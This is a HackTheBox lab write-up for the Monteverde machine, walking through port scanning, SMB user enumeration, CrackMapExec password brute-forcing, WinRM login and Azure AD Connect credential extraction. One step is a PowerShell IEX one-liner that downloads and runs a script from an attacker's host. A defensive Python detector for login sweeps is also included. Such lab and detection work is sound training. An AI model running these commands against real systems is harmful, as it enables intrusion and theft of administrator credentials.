Learn how to hack the Monteverde machine on HackTheBox: port scanning, brute-forcing SMB, using the Azure Admins group to elevate privileges, and gaining admin access.
In this article, we will brute-force an SMB password and elevate privileges to administrator level using an account that is a member of the Azure Admins group.
The lab is connected via VPN. It is recommended to avoid using your work computer or devices that store sensitive data, as you will be on a private network with other users who have cybersecurity expertise.
This machine has an IP address of 10.10.10.172, which I add to /etc/hosts.
10.10.10.172 monteverde.htb
First, a scan is performed for open ports. To save time, the initial scan is performed using masscan, as it takes longer to scan all ports with nmap.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.172 --rate=500
There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.
nmap monteverde.htb -p49778,88,593,49667,53,445,5985,49675,9389,3268,49706,389,464,49674,139,636,135,3269,49673
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A monteverde.htb -p88,593,53,445,5985,9389,3268,389,464,139,636,135,3269
First of all, we check SMB. We will do this using enum4linux. This way we will get the users, as well as their group membership.
enum4linux -a monteverde.htb
As usual, a password brute-force runs in parallel while we search for an entry point. Since the password policy requires a minimum password length of 7 characters, we build the user and password lists accordingly.
Now let’s run the brute-force using CrackMapExec.
cme smb monteverde.htb -u ./users.txt -p ./passwords.txt
Surprisingly, this worked – the user’s credentials were found. Now the resources available to this user are checked.
cme smb monteverde.htb -u SABatchJobs -p SABatchJobs --shares
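Seen from the defending side, the login sweep above leaves a recognizable trace: many failed network logons (event 4625) against different accounts from one address, followed by a success (4624). The following is an added example, not part of the original write-up; the event records, timestamps, 192.0.2.x addresses, user-a/b/c names and thresholds are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(time, event_id, user, ip):
    # Constructed record using Windows Security log field names; LogonType 3 = network.
    return {"TimeCreated": time, "EventID": event_id, "TargetUserName": user,
            "IpAddress": ip, "LogonType": 3}

# Constructed sample data (not captured from the lab): 4625 = failed, 4624 = successful logon.
EVENTS = [
    ev("2020-01-01T10:00:01", 4625, "user-a", "192.0.2.10"),
    ev("2020-01-01T10:00:02", 4625, "user-b", "192.0.2.10"),
    ev("2020-01-01T10:00:03", 4625, "user-c", "192.0.2.10"),
    ev("2020-01-01T10:00:04", 4625, "SABatchJobs", "192.0.2.10"),
    ev("2020-01-01T10:00:05", 4624, "SABatchJobs", "192.0.2.10"),
    # A user mistyping a password at their own workstation: must not be flagged.
    ev("2020-01-01T10:01:00", 4625, "user-a", "192.0.2.50"),
    ev("2020-01-01T10:01:09", 4625, "user-a", "192.0.2.50"),
    ev("2020-01-01T10:01:20", 4624, "user-a", "192.0.2.50"),
]

def detect_sweeps(events, window=timedelta(minutes=5), min_users=4):
    """Return {ip: finding} for sources whose failed network logons hit at least
    min_users distinct accounts within `window` (thresholds are assumptions)."""
    by_ip = defaultdict(list)
    for e in events:
        if e["LogonType"] == 3 and e["EventID"] in (4624, 4625):
            when = datetime.fromisoformat(e["TimeCreated"])
            by_ip[e["IpAddress"]].append((when, e["EventID"], e["TargetUserName"]))
    findings = {}
    for ip, rows in by_ip.items():
        rows.sort()
        fails = [(t, u) for t, eid, u in rows if eid == 4625]
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it spans at most `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if len({u for _, u in fails[start:end + 1]}) >= min_users:
                first = fails[start][0]
                findings[ip] = {
                    "targeted": len({u for _, u in fails}),
                    # Successes from the same source after the sweep began need review.
                    "succeeded_after": sorted({u for t, eid, u in rows
                                               if eid == 4624 and t >= first}),
                }
                break
    return findings
```

Calling `detect_sweeps(EVENTS)` flags only the sweeping source and lists the account that logged on successfully after the failures started.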
Let’s turn to the users$ share.
smbclient -U SABatchJobs%SABatchJobs //10.10.10.172/users$
Let’s recursively look at all the files on the server.
And let’s see what’s in the file.
Now we connect over WinRM and retrieve the user flag.
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
We check the user account information.
The account is a member of the Azure Admins group, which is our LPE vector. We use the Azure-ADConnect script to connect to the Azure database. We download the script from our local server to the remote machine and execute it.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.60/Azure-ADConnect.ps1')
Azure-ADConnect -server 127.0.0.1 -db ADSync
We get the administrator credentials. We connect and pick up the flag.
We now have full access to the system.
Working through the Monteverde machine on HackTheBox shows how practical cybersecurity skills help to find vulnerabilities and gain control over a system. Step by step, we performed port scanning, password brute-forcing, access rights analysis and elevation of privileges to the administrator level.
This process emphasizes the importance of knowing network protocols, account vulnerabilities and the specifics of integration with Azure. For cybersecurity professionals, this is not only training in technical skills, but also an important lesson in the value of protecting their systems from such attacks.